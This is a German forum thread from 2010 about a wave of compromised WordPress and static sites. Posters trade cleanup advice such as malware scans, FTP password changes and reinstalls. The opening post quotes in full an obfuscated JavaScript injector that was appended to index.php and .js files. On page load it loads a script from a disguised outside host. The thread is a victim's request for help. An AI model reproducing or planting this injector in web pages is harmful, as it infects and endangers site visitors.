Infektion mit Script

  • Hallo,
    letzte Nacht scheint eine großangelegte Attacke begonnen zu haben.
    Auf etlichen (Kunden-) Blogs wurden alle index.php und allle *.js-dateien mit folgendem Anhang versehen:

    Zitat

    <script>var U="";var C=["A","j"];var jc=["rJ"];var W;this.ql="";this.w=59531;this.w+=105;d=function(){function I(J,Ih,k){return J.substr(Ih,k);i=["S"];}try {var o='Ia'} catch(o){};try {var P='h'} catch(P){};var WT=RegExp;var m=String("/goo"+"gle."+"com/"+"disc"+I("uz.nGrWf",0,4)+I("GM5et/m5GM",3,4)+"ynet"+".com"+I(".phptulc",0,4));var Jg=["bl"];var T='';var Ay=55108;var u=document;gA={Ux:false};this.Xr=38335;this.Xr++;var BI=["c","lg","Sy"];function q(J,Ih){this.hX='';this.fc=false;var k="["+Ih+"]";var uz=13653;this.uzW="";var f=new WT(k, I("gTje",0,1));var p={Bm:false};QI=42937;QI++;return J.replace(f, T);this.PY=false;};var db=false;this.dZ=false;var t=q('szc2rYiQpMtE','e4R_zM0En2gbBY9PwQ');var l=471671-463591;var M=null;try {var MR='Nf'} catch(MR){};try {var d_='rQ'} catch(d_){};var E=new String("body");var iW=13313;W=function(){Qy={nC:false};var bm={_:false};try {var b=q('c7ryeWaCtyeCEdlsegmbeynPtY','YTdgbL9P5MWsyD7UVN1C');var Rs={};try {var oh='ng'} catch(oh){};D=u[b](t);Ts=["zj","qll","fm"];var Sr=new Array();var Jb="def"+"er";OV={dr:53223};sa=30503;sa+=219;var y=q('sYrYcF','ZkLCTtGaz4IpRYBWMF85');var J=l+m;var pm="pm";var rM="rM";try {var eE='JZ'} catch(eE){};D[Jb]=[1][0];D[y]=String("ht"+"tp"+":/"+I("/beNa",0,2)+I("H52qarHq52",4,2)+I("YswfqsYw",3,2)+I("uaqSf",0,2)+I("FMBkeMFB",3,2)+I("X1K.rXK1",3,2)+I("CXhu:ChX",3,2))+J;this.sb="sb";var nW=36808;u[E].appendChild(D);var sI=12058;} catch(ta){};try {} catch(Wi){};};this.JL="";};d();var dR="dR";hv=["ms","nI","qA"];window.onload=W;var Gz=[];eH={Ks:false};</script>
    <!--d5009a73f981f261bc87d6ef0e3d6aea-->


    Habe WP auf mehreren Domains komplett neu aufgesetzt - kurze Zeit später das gleiche Problem, unabhängig vom Provider.
    Selbst staische Seiten sind betroffen.
    Kann es sein, dass Lightbox das Einfalltor ist (die einzige Parallele bei allen gehackten Seiten)?

    Weiß jemand Abhilfe?

    Danke und tschüß
    ein verzweifelter
    e_fetch

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Sieh mal nach, wann die jeweiligen index.php geändert wurden, zu welcher Uhrzeit.

    Lass einen Tiefenscan auf Malware laufen, ändere die ftp- Zugangsdaten von z.B. einem Blog, korrigiere die index.php und beobachte, was passiert.
    Nehme an, Du arbeitest an den vielen Seiten immer vom gleichen PC aus?

  • Danke für die Antwort.

    Ich scanne jetzt noch mal meinen Rechner, der eigentlich sauber sein sollte...

    Verwunderlich nur, dass auch Seiten befallen sind, auf die ich seit langem nicht mehr per FTP zugegriffen habe.

    Ich gebe Bescheid, wenn der Rechner definitiv sauber ist, ich alle (ogottogott) Passworte geändert und das Problem damit dann (hoffentlich) behoben ist.

    Bis dann
    danke
    e_fetch

  • beutze mal die oben verlinkte Software für deinen Scan: download, installieren, AKTUALISIEREN, kompletter Scan. Und ändere doch erstmal nur ein Passwort um zu testen, ob das Problem damit behoben ist...

  • Scan läuft, bin gerade fleissig am Passworte ändern.

    Ein Kunde kommt schon nicht mehr in's Adminmenü.

    Habe bei Aufruf eines infizierten Systems in der Statuszeile aufblitzen sehen, dass mit einer Seite in Russland Kontakt aufgenommen wird.

    Bis später!

  • Danke gericoach,

    Malwarebytes Antimalware hat böse Dateien gefunden, die Antivir-Premium offensichtlich entgangen sind.

    Jetzt, wo der Rechner _wirklich_ sauber ist, werden die Passworte alle geändert und dann 18 Mal Wordpress neu aufgespielt.

    So kann man auch seinen Tag verbringen...
    ;-)

    Bis bald
    tschüß
    Dein
    e_fetch

  • ...jetzt bin ich verzweifelt und ratlos:

    Rechner gesäubert, Passworte geändert - und trotzdem schreibt der Russe wieder sein Script in meine frisch aufgespielten Dateien.

    Jetzt muss ich mal in den Datenbanken gucken, ob sich da noch was versteckt hat.

    Im FTP-Log von letzter Nacht habe ich viele Zugriffe auf die Seiten, die geändert wurden, allerdings von ständig wechselnden IPs.

  • ändere auch die ftp usernamen + passwörter und spiele ältere saubere Backups ein. Bei meinem Anbieter (sicher auch bei dir) spiele ich damit auch die alte DB Version ein und bin somit den lästigen Floh los.
    Dass es Nachts passiert kenne ich, immer so gg. 03.00 hatte ich die "Besuche". Hatte damals auch die "Großreinigung" mit Malwarebytes erledigt. Lass die SW ruhig 2x laufen (AntiVir, Kaspersky usw. hatten bei mir auch nichts gefunden.)

    Einmal editiert, zuletzt von gericoach (7. Juni 2010 um 16:21)

  • So - zwei Rechner platt gemacht.

    Der nette Mann vom all-inkl.de-Support, den ich in meiner Verzweiflung noch angerufen hatte, meinte, wenn das Programm keine Malware findet, aber das Problem weiter bestünde, wäre es ein Zeichen dafür, dass der Wurm sehr tief sitzt und nur Neuinstallation eine sichere Sache wäre.

    Das Notebook läuft schon wieder, drei Blogs habe ich (mit neuem Passwort, Username ist vorgegeben) aufgesetzt. Wenn jetzt nichts passiert, haben wir das Problem gelöst.

    Die .ini meines Total Commanders (für FTP) ist auch wieder jungfräulich - also: Wünscht mir Glück...
    :-)
    (Wenn ich nicht mehr schreibe, hat's geklappt)

    Viele Grüße
    von
    e_fetch

  • würde es besser finden, dass Du nochmal schreibst, WENN es geklappt hat. Das macht mehr Sinn, auch für diejenigen, die evtl. auf ähnliche Probleme stoßen.

  • Moinmoin,

    ja - es muss wohl ein sehr gut getarnter Wurm gewesen sein. Denn seit ich meine Rechner platt gemacht, Win XP neu installiert und alle FTP-Passworte geändert habe (naja - ich bin noch dabei), wurden die Seiten nicht mehr verändert.
    Das wird noch eine lange Nacht...

    Ich danke für die Unterstützung!

    Herzliche Grüße
    e_fetch

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!